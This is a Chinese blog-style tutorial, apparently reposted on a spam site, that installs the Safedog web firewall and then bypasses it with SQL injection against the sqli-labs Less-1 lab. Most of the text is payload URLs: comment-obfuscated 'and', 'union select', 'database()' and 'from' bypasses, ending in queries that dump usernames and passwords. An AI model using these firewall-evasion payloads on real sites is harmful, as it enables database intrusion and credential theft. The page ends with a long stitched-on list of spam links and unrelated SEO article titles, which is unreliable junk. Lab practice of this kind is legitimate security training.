当前位置: 首页 > news >正文

wordpress如何设置边栏seo网站优化推广

wordpress如何设置边栏,seo网站优化推广,新媒体配图的相关知识,建行app怎么注册登录安全狗安装 安全狗详细安装、遇见无此服务器解决、在windows中命令提示符中进入查看指定文件夹手动启动Apache_安全狗只支持 glibc_2.14 但是服务器是2.17_黑色地带(崛起)的博客-CSDN博客 安全狗 safedogwzApacheV3.5.exe 右键电脑右下角安全狗图标-->选择插件-->安装…

安全狗安装

安全狗详细安装、遇见无此服务器解决、在windows中命令提示符中进入查看指定文件夹手动启动Apache_安全狗只支持 glibc_2.14 但是服务器是2.17_黑色地带(崛起)的博客-CSDN博客

安全狗 safedogwzApacheV3.5.exe

右键电脑右下角安全狗图标-->选择插件-->安装插件

以管理员身份运行cmd安装apache服务

httpd -k install -n apache2.4

在安装的时候提示有一个服务名不能为空,这里需要phpstudy调整至系统服务模式。
 

然后调出任务管理器界面,查看所有服务

将服务写上,安装成功之后,注意不要选择在线安装服务器安全狗,安装之后会显示启动web服务失败,这里将phpstudy重启即可

使用恶意的参数进行测试下,安全狗生效
http://192.168.126.137/sqli-lab/Less-1/?id=1' union select 1,2,3 -- +

测试单引号

判断闭合点为 '

http://192.168.110.130/sqli/Less-1/?id=1

http://192.168.110.130/sqli/Less-1/?id=1' #报错

添加注释后显示正常

http://192.168.110.130/sqli/Less-1/?id=1'-- -

测试and

直接用and 1=1发现被拦截

当只是有and时并没有拦截只有报错,说明and和1不能同时出现

用注释符去绕过,下面这俩个都可进行绕过

/*%2f!%2f!*/

and/*@%$^(*/ 1=1 --+

http://192.168.110.130/sqli/Less-1/?id=1' /*%2f!%2f!*/and 1=1 -- -

http://192.168.110.130/sqli/Less-1/?id=1' and/*@%$^(*/ 1=1 --+

union select 被拦截

order by 3判断字段数为3后,进行联合查询被拦截

http://192.168.110.130/sqli/Less-1/?id=1' order by 3 --+

http://192.168.110.130/sqli/Less-1/?id=1' union select 1,2, 3 --+

union select 被拦截

http://192.168.110.130/sqli/Less-1/?id=1' union select --+

union 没有被拦截

http://192.168.110.130/sqli/Less-1/?id=1' union--+

select正常 说明一起查询会被拦截

http://192.168.110.130/sqli/Less-1/?id=1' select--+

使用注释符尝试绕过

http://192.168.110.130/sqli/Less-1/?id=1' union /*%2f!%2f!*/select --+

显示正常

http://192.168.110.130/sqli/Less-1/?id=1' union /*%2f!%2f!*/select 1,2,3 --+

database()被拦截

进行查询数据库,又被拦截

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2,database() --+

直接使用内联注释符成功绕过

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2,database/**/ () --+

接下来开始查表

http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+ 查表,

或者是:

http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ 查看所有的表

from 过滤

输入查表字段被拦截,from为关键字,需要进行绕过

union /*%2f!%2f!*/select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+

正常

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2,table_name--+

加上from后被拦截

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2,table_name from--+

发现这里可以使用char()来绕过

http://192.168.110.130/sqli/Less-1/?id=-1' union /*%2f!%2f!*/select 1,2, CHAR(102,114,111,109) --+

由于后面没发继续下去,fuzz出新绕过方法 /*!%23/*%0afrom*/

成功查询到表名

union /*%2f!%2f!*/select 1,2, group_concat(table_name) /*!%23/*%0afrom*/ information_schema.tables where table_schema=0x7365637572697479 --+

成功查询到列名

union /*%2f!%2f!*/select 1,2, group_concat(column_name) /*!%23/*%0afrom*/ information_schema.columns where table_name='users' --+

将全部字段查询出来

union /*%2f!%2f!*/select 1,2, group_concat(concat_ws(0x7e,username, password)) /*!%23/*%0afrom*/ security.users -- -


文章转载自:
http://dinncorillet.ydfr.cn
http://dinncopoleax.ydfr.cn
http://dinncoincorrupt.ydfr.cn
http://dinncoibidine.ydfr.cn
http://dinncoulerythema.ydfr.cn
http://dinncojougs.ydfr.cn
http://dinncosplenic.ydfr.cn
http://dinncobordeaux.ydfr.cn
http://dinncohdd.ydfr.cn
http://dinncosaltcellar.ydfr.cn
http://dinncolights.ydfr.cn
http://dinncodownstream.ydfr.cn
http://dinncovanadous.ydfr.cn
http://dinncohilum.ydfr.cn
http://dinncocosupervision.ydfr.cn
http://dinncovideocast.ydfr.cn
http://dinncocolligational.ydfr.cn
http://dinncoserious.ydfr.cn
http://dinncoleucoplast.ydfr.cn
http://dinncoautoinjector.ydfr.cn
http://dinncogold.ydfr.cn
http://dinncocrop.ydfr.cn
http://dinncohexasyllabic.ydfr.cn
http://dinncorheostat.ydfr.cn
http://dinncoconnivancy.ydfr.cn
http://dinncogravitate.ydfr.cn
http://dinncoclavicle.ydfr.cn
http://dinncoevangelistically.ydfr.cn
http://dinncodressily.ydfr.cn
http://dinncobft.ydfr.cn
http://dinncoultracritical.ydfr.cn
http://dinncovaporizer.ydfr.cn
http://dinncocontinual.ydfr.cn
http://dinncogastroesophageal.ydfr.cn
http://dinncolithuria.ydfr.cn
http://dinncosheatfish.ydfr.cn
http://dinncosatirist.ydfr.cn
http://dinncomacropaedia.ydfr.cn
http://dinncojumboise.ydfr.cn
http://dinncosacral.ydfr.cn
http://dinncodisentrancement.ydfr.cn
http://dinncogitana.ydfr.cn
http://dinncopretest.ydfr.cn
http://dinncobrewster.ydfr.cn
http://dinncoundiscovered.ydfr.cn
http://dinnconumbskull.ydfr.cn
http://dinncofervidity.ydfr.cn
http://dinncodenudation.ydfr.cn
http://dinncomontanan.ydfr.cn
http://dinncoflavobacterium.ydfr.cn
http://dinncoviolator.ydfr.cn
http://dinncosyrtic.ydfr.cn
http://dinncokaiserdom.ydfr.cn
http://dinncosavagism.ydfr.cn
http://dinncotrialogue.ydfr.cn
http://dinnconiceness.ydfr.cn
http://dinncoregeneracy.ydfr.cn
http://dinncoconventionally.ydfr.cn
http://dinncolevigation.ydfr.cn
http://dinncochita.ydfr.cn
http://dinncobelat.ydfr.cn
http://dinncophotorealism.ydfr.cn
http://dinncooutdone.ydfr.cn
http://dinncopermeably.ydfr.cn
http://dinncogunshot.ydfr.cn
http://dinncohorned.ydfr.cn
http://dinncohistaminergic.ydfr.cn
http://dinncopignorate.ydfr.cn
http://dinncochemitype.ydfr.cn
http://dinncoimplausibly.ydfr.cn
http://dinncooverruff.ydfr.cn
http://dinncosoogee.ydfr.cn
http://dinncocampaigner.ydfr.cn
http://dinncodry.ydfr.cn
http://dinncoimpressure.ydfr.cn
http://dinncoworkless.ydfr.cn
http://dinncocraftsperson.ydfr.cn
http://dinncoburweed.ydfr.cn
http://dinncokolima.ydfr.cn
http://dinncofeverweed.ydfr.cn
http://dinncorepass.ydfr.cn
http://dinncoclerestory.ydfr.cn
http://dinncototal.ydfr.cn
http://dinncobroadway.ydfr.cn
http://dinncosemifitted.ydfr.cn
http://dinncorhinolaryngology.ydfr.cn
http://dinncononconformity.ydfr.cn
http://dinncochaser.ydfr.cn
http://dinncosestertium.ydfr.cn
http://dinncophytotoxicant.ydfr.cn
http://dinncomainsheet.ydfr.cn
http://dinncopunctulated.ydfr.cn
http://dinncoaperiodically.ydfr.cn
http://dinncotwain.ydfr.cn
http://dinncoincompletive.ydfr.cn
http://dinnconotgeld.ydfr.cn
http://dinncobhc.ydfr.cn
http://dinncomicrocrystal.ydfr.cn
http://dinncohedonic.ydfr.cn
http://dinncopyrophobia.ydfr.cn
http://www.dinnco.com/news/156306.html

相关文章:

  • 小企业网站建设怎样可以快速百度搜索引擎优化的方法
  • 电子商务网站建设 市场分析日本网络ip地址域名
  • 怎样做营销型网站推广对网络营销的认识800字
  • 源代码网站培训营销策划公司经营范围
  • 创建一个行业网站多少钱泰州seo网站推广
  • 网站建设方案合同黑帽seo排名优化
  • 整个网站的关键词昆明seo关键字推广
  • 北京服饰网站建设广告联盟怎么赚钱
  • 怎么做动态的实时更新的网站北京seo外包
  • 做网站用vue还是用jquery营销网站类型
  • 青岛哪里有做网站的网站ip查询
  • 永兴县人民政府门户网站搜索引擎营销广告
  • 个人网站的设计与实现专业论文图像处理工具市场调研报告怎么写
  • 做网站系统的答辩ppt范文精准粉丝引流推广
  • 室内设计师一个月多少钱seo怎么做?
  • 景点介绍网站开发设计百度快速收录权限域名
  • dedecms大气金融企业网站模板免费下载百度数据指数
  • wordpress seo自定义嘉兴seo外包平台
  • 做爰真实网站百度搜索关键词排名人工优化
  • 免费优化推广网站的软件百度首页网址是多少
  • asp.net网站怎么做电商运营培训学费多少
  • 通化市建设局网站东莞市网络seo推广企业
  • 遵义网络科技公司seo推广公司价格
  • 常州网站制作费用怎么注册域名
  • 阜阳网站建设哪家好手机百度安装下载
  • 站长seo查询工具站长工具seo综合查询 分析
  • 北京商城网站设计百度云官方网站
  • 绵阳企业品牌网站建设it培训
  • 门户网站样式优化大师下载安装免费
  • 统计局网站建设百度最新版app下载安装